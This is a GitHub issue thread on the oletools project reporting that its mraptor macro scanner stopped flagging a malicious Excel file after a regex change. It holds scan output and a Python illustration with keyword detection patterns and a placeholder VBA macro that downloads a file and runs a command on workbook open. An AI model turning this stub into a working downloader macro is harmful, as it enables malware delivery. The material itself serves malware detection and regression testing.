decalage2 / oletools

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
http://www.decalage.info/python/oletools

Regression: mraptor no longer detects malicious macro in xlsm file #659

Open robert-scheck opened 3 years ago

robert-scheck commented 3 years ago

The mraptor-2 command uses Python 2.7, the mraptor-3 command uses Python 3.6, both on CentOS 7 (x86_64). The file is indeed the same, and the file still should be treated as malicious, thus this issue seems to be a regression in mraptor introduced sometime after oletools 0.51.

$ mraptor-2 virusexcel.xlsm 
MacroRaptor 0.51 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
SUSPICIOUS|AWX  |OpX |virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 20 - SUSPICIOUS
$ 
$ mraptor-2 virusexcel.xlsm
MacroRaptor 0.54 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
Macro OK  |-WX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
$
$ mraptor-3 virusexcel.xlsm
MacroRaptor 0.54 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
Macro OK  |-WX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
$ 
$ sha256sum virusexcel.xlsm 
adc078982da3f9a8d343d51f91805ad63d4e9afd060a23f47bc5cecf293f386e  virusexcel.xlsm
$ 

Interestingly, olevba still seems to treat the file correctly, so the issue might be limited to mraptor?

$ olevba-2 -a virusexcel.xlsm 
olevba 0.51 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OpX:M-S-H--- virusexcel.xlsm
===============================================================================
FILE: virusexcel.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet2'
-------------------------------------------------------------------------------
VBA MACRO Sheet3.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet3'
-------------------------------------------------------------------------------
VBA MACRO Sheet4.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet4'
+------------+--------------------+-----------------------------------------+
| Type       | Keyword            | Description                             |
+------------+--------------------+-----------------------------------------+
| Suspicious | Run                | May run an executable file or a system  |
|            |                    | command                                 |
| Suspicious | URLDownloadToFileA | May download files from the Internet    |
| Suspicious | Lib                | May run code from a DLL                 |
| Suspicious | Hex Strings        | Hex-encoded strings were detected, may  |
|            |                    | be used to obfuscate strings (option    |
|            |                    | --decode to see all)                    |
+------------+--------------------+-----------------------------------------+

$ 
$ olevba-3 -a virusexcel.xlsm 
olevba 0.54.2 on Python 3.6.8 - http://decalage.info/python/oletools
===============================================================================
FILE: virusexcel.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet2'
-------------------------------------------------------------------------------
VBA MACRO Sheet3.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet3'
-------------------------------------------------------------------------------
VBA MACRO Sheet4.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet4'
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Lib                 |May run code from a DLL                      |
|Suspicious|URLDownloadToFileA  |May download files from the Internet         |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

$ 
robert-scheck commented 3 years ago

The regression was introduced by commit ca75f0085104d01bddb283a53bd9c6af6affbf92, because:

$ wget -q https://raw.githubusercontent.com/decalage2/oletools/f56062def0e72718201c50392d866c2cdbeb3b7e/oletools/mraptor.py -O mraptor-f56062d.py
$ python3 mraptor-f56062d.py virusexcel.xlsm
MacroRaptor 0.54dev14 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
SUSPICIOUS|AWX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 20 - SUSPICIOUS
$ 
$ wget -q https://raw.githubusercontent.com/decalage2/oletools/ca75f0085104d01bddb283a53bd9c6af6affbf92/oletools/mraptor.py -O mraptor-ca75f00.py
$ python3 mraptor-ca75f00.py virusexcel.xlsm
MacroRaptor 0.54dev14 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File                                                    
----------+-----+----+--------------------------------------------------------
Macro OK  |-WX  |OpX:|virusexcel.xlsm                                         

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
$  

From my point of view, the regular expression in line 120 was adapted wrongly.
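The two mraptor runs above differ only in the AutoExec flag (`AWX` versus `-WX`), and that single flag flips the verdict from `SUSPICIOUS` (exit code 20) to `Macro OK` (exit code 2). The following Python is an added illustration, not oletools code and not the reporter's: it re-implements the flag logic in simplified form to show why a narrowed AutoExec pattern makes the same Write+Execute content pass, and how a small regression check over known samples would have caught the change. The keyword patterns, the "narrowed" pattern and the VBA snippets are constructed for this example; mraptor's real patterns live in `oletools/mraptor.py`. The rule SUSPICIOUS = AutoExec and (Write or Execute) is the one implied by the outputs on this page.

```python
import re

# Constructed VBA text standing in for a macro-enabled .xlsm (not the sample
# from the issue; the page only shows scan output). Placeholders, not a payload.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub Workbook_Open()
    Dim r As Long
    r = URLDownloadToFileA(0, "http://PLACEHOLDER_HOST/", "PLACEHOLDER_PATH", 0, 0)
    Shell "PLACEHOLDER_COMMAND", vbHide
End Sub
'''

# Constructed benign macro: auto-executes, but neither writes nor executes.
BENIGN_VBA = r'''
Private Sub Workbook_Open()
    MsgBox "Hello"
End Sub
'''

# Simplified keyword patterns (illustrative, not mraptor's actual regexes).
# "Complete": covers Auto_*, Document_* and Workbook_* event handlers.
AUTOEXEC_COMPLETE = re.compile(
    r'\b(?:Auto_?Open|Auto_?Close|Auto_?Exec|AutoExit|AutoNew|'
    r'Document_Open|Document_Close|Document_New|'
    r'Workbook_Open|Workbook_Close|Workbook_Activate|Workbook_BeforeClose)\b',
    re.IGNORECASE)

# Hypothetical narrowed pattern: the Workbook_* handlers used by Excel
# files have been dropped, which is the kind of edit that silently
# removes the AutoExec flag for .xlsm samples.
AUTOEXEC_NARROWED = re.compile(
    r'\b(?:Auto_?Open|Auto_?Close|Auto_?Exec|AutoExit|AutoNew|'
    r'Document_Open|Document_Close|Document_New)\b',
    re.IGNORECASE)

WRITE = re.compile(
    r'\b(?:FileCopy|CopyFile|Kill|CreateTextFile|URLDownloadToFileA|URLDownloadToFile|'
    r'Open\s+.+\s+For\s+(?:Binary|Output|Append))\b',
    re.IGNORECASE)

EXECUTE = re.compile(
    r'\b(?:Shell|WScript\.Shell|Run|Exec|CreateObject|CallByName|GetObject)\b|\bLib\s+"',
    re.IGNORECASE)


def triage(vba_code, autoexec_re=AUTOEXEC_COMPLETE):
    """Return (flags, result, exit_code) in the style of mraptor's table.

    flags is a three-character string: A/W/X or '-' in each position.
    A macro is SUSPICIOUS only if it auto-executes AND writes or executes.
    """
    a = bool(autoexec_re.search(vba_code))
    w = bool(WRITE.search(vba_code))
    x = bool(EXECUTE.search(vba_code))
    flags = ('A' if a else '-') + ('W' if w else '-') + ('X' if x else '-')
    suspicious = a and (w or x)
    result = 'SUSPICIOUS' if suspicious else 'Macro OK'
    exit_code = 20 if suspicious else 2
    return flags, result, exit_code


def regression_check(samples, autoexec_re):
    """Run triage over (name, vba, expected_result) tuples and return the
    names whose verdict no longer matches the recorded expectation.

    Keeping such a list of known samples next to the detection rules is
    what turns a quiet pattern edit into a failing test.
    """
    failures = []
    for name, vba, expected in samples:
        _, result, _ = triage(vba, autoexec_re)
        if result != expected:
            failures.append(name)
    return failures


KNOWN_SAMPLES = [
    ('xlsm-downloader', SAMPLE_VBA, 'SUSPICIOUS'),
    ('xlsm-benign-msgbox', BENIGN_VBA, 'Macro OK'),
]

if __name__ == '__main__':
    for label, pattern in (('complete', AUTOEXEC_COMPLETE), ('narrowed', AUTOEXEC_NARROWED)):
        flags, result, code = triage(SAMPLE_VBA, pattern)
        print(f'{label:9s} {flags} {result:10s} exit={code} '
              f'regressions={regression_check(KNOWN_SAMPLES, pattern)}')
```

With the complete pattern the constructed sample reports `AWX` / `SUSPICIOUS` / 20, exactly the shape of the 0.51 output above; with the narrowed pattern the same text reports `-WX` / `Macro OK` / 2, the shape of the 0.54 output, and `regression_check` names the sample that changed verdict while the benign `A--` macro stays `Macro OK` under both.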

sbidy commented 3 years ago

Are there any updates on that topic?